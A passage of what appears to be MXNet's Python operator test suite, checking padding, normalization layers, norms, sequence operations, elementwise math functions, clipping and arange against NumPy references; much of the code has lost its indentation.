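# groups the flat tuple into consecutive pairs.  The helper below is hypothetical and
# exists only to demonstrate the trick.
def _example_pad_width_grouping():
    pad_width = (0, 0, 0, 0, 1, 2, 3, 4)
    grouped = list(zip(*[iter(pad_width)] * 2))
    assert grouped == [(0, 0), (0, 0), (1, 2), (3, 4)]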
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
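# Minimal sanity sketch (not part of the test suite): with gamma=1 and beta=0 the
# reference np_instance_norm above should leave every (sample, channel) slice with
# roughly zero mean and unit variance over the spatial axes.  The function name is
# hypothetical and is never invoked by the tests.
def _example_np_instance_norm():
    x = np.random.normal(size=(2, 3, 8, 8))
    y = np_instance_norm(x, np.ones(3), np.zeros(3), eps=1e-5)
    assert np.allclose(y.mean(axis=(2, 3)), 0.0, atol=1e-6)
    assert np.allclose(y.var(axis=(2, 3)), 1.0, atol=1e-3)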
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
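# Minimal sketch (illustrative only): in 'channel' mode the reference above divides
# every spatial position by the L2 norm taken across the channel axis, so a 2-channel
# toy example with values (3, 4) normalizes to (0.6, 0.8).  The helper is hypothetical.
def _example_l2_channel_norm():
    x = np.array([[[3.0], [4.0]]])      # shape (1, 2, 1): one sample, two channels
    norm = np.linalg.norm(x, axis=1)    # -> [[5.0]]
    y = x / norm[:, np.newaxis]         # broadcast the norm back over the channel axis
    assert np.allclose(y[0, :, 0], [0.6, 0.8])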
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
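# Self-contained sketch (illustrative, not called by the tests) of the data-gradient
# identity used in npy_layer_norm_grad above:
#   dL/dx = w - mean(w) - x_hat * mean(w * x_hat),   with w = dL/dy * gamma / std,
# verified against a central finite difference on a tiny input.  All names below are
# local to this example.
def _example_layer_norm_data_grad():
    rng = np.random.RandomState(0)
    x = rng.normal(size=(3, 4))
    gamma = rng.normal(size=(4,))
    og = rng.normal(size=(3, 4))
    eps = 1e-5
    def fwd(inp):
        mu = inp.mean(axis=-1, keepdims=True)
        std = np.sqrt(inp.var(axis=-1, keepdims=True) + eps)
        return gamma * (inp - mu) / std
    # Analytic gradient from the identity above.
    mu = x.mean(axis=-1, keepdims=True)
    std = np.sqrt(x.var(axis=-1, keepdims=True) + eps)
    x_hat = (x - mu) / std
    w = og * gamma / std
    grad = w - w.mean(axis=-1, keepdims=True) - x_hat * (w * x_hat).mean(axis=-1, keepdims=True)
    # Central finite difference of L = sum(og * fwd(x)).
    num, h = np.zeros_like(x), 1e-6
    for idx in np.ndindex(*x.shape):
        xp, xm = x.copy(), x.copy()
        xp[idx] += h
        xm[idx] -= h
        num[idx] = ((fwd(xp) - fwd(xm)) * og).sum() / (2 * h)
    assert np.allclose(grad, num, rtol=1e-4, atol=1e-6)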
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
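# Minimal sketch (illustrative only) of the reference behaviour above: masking replaces
# every position at or beyond each sequence length with `value`, and reversing flips
# only the first `length` steps of each sequence.  The helper name is hypothetical and
# is never called by the tests.
def _example_sequence_numpy_refs():
    arr = np.arange(12, dtype=np.float32).reshape(3, 2, 2)  # (seqlen=3, batch=2, feat=2)
    masked = sequence_mask_numpy(arr, lengths=[1, 2], axis=0, value=-1.0)
    assert (masked[1:, 0] == -1.0).all() and (masked[2:, 1] == -1.0).all()
    reversed_ = sequence_reverse_numpy(arr, lengths=[2, 3], axis=0)
    assert (reversed_[0, 0] == arr[1, 0]).all() and (reversed_[2, 0] == arr[2, 0]).all()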
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
